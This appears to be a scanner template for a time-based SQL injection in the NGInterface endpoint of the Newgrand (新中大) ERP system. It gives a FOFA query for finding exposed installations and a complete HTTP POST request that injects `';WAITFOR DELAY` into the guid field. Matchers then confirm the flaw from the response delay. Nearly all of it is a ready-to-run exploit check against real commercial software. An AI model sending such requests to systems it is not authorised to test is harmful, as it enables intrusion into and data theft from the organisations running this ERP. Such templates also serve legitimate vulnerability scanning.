## id: VEID-2025-0902
## name: 新中大ERP企业管理软件 NGInterface 存在SQL注入
## author: hack007x
## severity: high
## tags: veid,sql,veid2025
## fofa-query: body="Resource/pic/product_btn.png" || body="/login/SSOValidation.html"
## verification: true


POST /filesrv/NGInterface/Index HTTP/1.1
Host: {{Hostname}}
User-Agent: {{random_ua}}
Content-Type: application/x-www-form-urlencoded

type=getfilelist&guid=';WAITFOR+DELAY+'0:0:7'--

#@ timeout: 20
#@ condition: and
#@ matcher: status_code == 200
#@ matcher: response_time > 7
#@ matcher: header["Content-Type"] contains "plain" 
#@ matcher: body contains "[]"





# @VEIL-STAMP: 913a43c4ce7f9076cbf0e4ade707be86a5d06c8889d2cf603f4cff2fd76d078b
